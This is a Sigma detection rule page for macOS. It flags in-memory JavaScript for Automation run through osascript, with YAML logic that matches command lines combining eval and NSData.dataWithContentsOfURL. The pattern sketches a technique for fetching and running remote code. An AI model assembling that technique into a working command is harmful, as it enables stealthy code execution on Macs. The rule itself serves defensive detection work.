Phoenix
Sigma IntelligenceBeta
Back to Rules
Detectionhightest

JXA In-memory Execution Via OSAScript

Detects possible malicious execution of JXA in-memory via OSAScript

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
Sohan G (D4rkCiph3r)Created Tue Jan 31f1408a58-0e94-4165-b80a-da9f96cf6fc3macos
Log Source
macOSProcess Creation
ProductmacOS← raw: macos
CategoryProcess Creation← raw: process_creation

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic
Detection Logic2 selectors
detection:
    selection_main:
        CommandLine|contains|all:
            - 'osascript'
            - ' -e '
            - 'eval'
            - 'NSData.dataWithContentsOfURL'
    selection_js:
        - CommandLine|contains|all:
              - ' -l '
              - 'JavaScript'
        - CommandLine|contains: '.js'
    condition: all of selection_*
False Positives
Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

References
1
Resolving title…
redcanary.com
MITRE ATT&CK
Related Rules
DerivedDetectionmedium

MacOS Scripting Interpreter AppleScript

Detects execution of AppleScript of the macOS scripting language AppleScript.

This rule was derived from the related rule - both detect similar activity with different scope.

Rule Metadata
Rule ID
f1408a58-0e94-4165-b80a-da9f96cf6fc3
Status
test
Level
high
Type
Detection
Created
Tue Jan 31
Author
Sohan G (D4rkCiph3r)
Path
rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml
Raw Tags
attack.t1059.002attack.t1059.007attack.execution
View on GitHub